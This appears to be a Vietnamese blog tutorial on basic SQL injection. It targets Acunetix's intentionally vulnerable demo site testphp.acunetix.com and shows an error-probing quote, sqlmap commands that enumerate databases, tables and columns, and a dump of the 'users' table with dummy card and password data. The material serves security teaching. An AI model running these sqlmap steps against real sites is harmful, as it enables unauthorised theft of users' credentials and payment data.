Basic SQL Injection with sqlmap

SQL Injection with sqlmap
Site: http://testphp.acunetix.com/

=======================
1. Check the URL.

Chèn thử dấu ‘ phía sau địa chỉ để kiểm tra lỗi: http://testphp.acunetix.com/search.php?test=query’

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

Có lỗi rồi. Mình sẽ dùng sqlmap để kiểm tra.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dbs
=> Lệnh này mình dùng để kiểm tra xem trang web dùng Database tên gì (get database name)

[INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[INFO] fetching database names

available databases [2]:

[*] acuart

[*] information_schema

Cái “information_schema” là DB mặc định của MySQL. Đừng quan tâm đến nó.
Cái “acuart” là tên của DB trang web, cái chúng ta cần.

2. Sau khi có tên DB, chúng ta sẽ get Table.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –tables D acuart

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Database: acuart

[8 tables]

+-----------+

| artists |

| carts |

| categ |

| featured |

| guestbook |

| pictures |

| products |

| users |

+-----------+

sqlmap lấy thông tin khá nhanh.

3. Get Columns.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –columns D acuart

Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int(5)      |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int(11)      |
| price   | int(11)      |
+---------+--------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int(11)      |
| cat_id | int(11)      |
| img    | varchar(50)  |
| pic_id | int(5)       |
| plong  | text         |
| price  | int(11)      |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| feature_text | text    |
| pic_id       | int(11) |
+--------------+---------+

Database: acuart
Table: products
[5 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| description | text             |
| id          | int(10) unsigned |
| name        | text             |
| price       | int(10) unsigned |
| rewritename | text             |
+-------------+------------------+

Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int(5)      |
+-----------+-------------+

Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int(32)      |
+----------+--------------+

Table: categ

[3 columns]

+--------+-------------+

| Column | Type |

+--------+-------------+

| cat_id | int(5) |

| cdesc | tinytext |

| cname | varchar(50) |

+--------+-------------+

Database: acuart

Table: users

[8 columns]

+---------+--------------+

| Column | Type |

+---------+--------------+

| address | mediumtext |

| cart | varchar(100) |

| cc | varchar(100) |

| email | varchar(100) |

| name | varchar(100) |

| pass | varchar(100) |

| phone | varchar(100) |

| uname | varchar(100) |

+---------+--------------+

Database: acuart

Table: carts

[3 columns]

+---------+--------------+

| Column | Type |

+---------+--------------+

| cart_id | varchar(100) |

| item | int(11) |

| price | int(11) |

+---------+--------------+

Database: acuart

Table: pictures

[8 columns]

+--------+--------------+

| Column | Type |

+--------+--------------+

| a_id | int(11) |

| cat_id | int(11) |

| img | varchar(50) |

| pic_id | int(5) |

| plong | text |

| price | int(11) |

| pshort | mediumtext |

| title | varchar(100) |

+--------+--------------+

Database: acuart

Table: featured

[2 columns]

+--------------+---------+

| Column | Type |

+--------------+---------+

| feature_text | text |

| pic_id | int(11) |

+--------------+---------+

Database: acuart

Table: products

[5 columns]

+-------------+------------------+

| Column | Type |

+-------------+------------------+

| description | text |

| id | int(10) unsigned |

| name | text |

| price | int(10) unsigned |

| rewritename | text |

+-------------+------------------+

Database: acuart

Table: artists

[3 columns]

+-----------+-------------+

| Column | Type |

+-----------+-------------+

| adesc | text |

| aname | varchar(50) |

| artist_id | int(5) |

+-----------+-------------+

Database: acuart

Table: guestbook

[3 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| mesaj | text |

| sender | varchar(150) |

| senttime | int(32) |

+----------+--------------+

4. Dump Data.

Có khá nhiều bảng, mình sẽ lấy dữ liệu của bảng tên là “users”. Trong bảng này thường có nhiều thông tin cần thiết cho việc tấn công.

root@kali:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dump -D acuart -T users

Database: acuart
Table: users
[1 entry]
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart                             | pass | uname | phone   | email           | address   |
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 2151a037665545e3772e324cce1add90 | test | test  | 2323345 | email@email.com | 21 street |
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+

[15:32:57] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.acunetix.com/dump/acuart/users.csv'
[15:32:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.acunetix.com'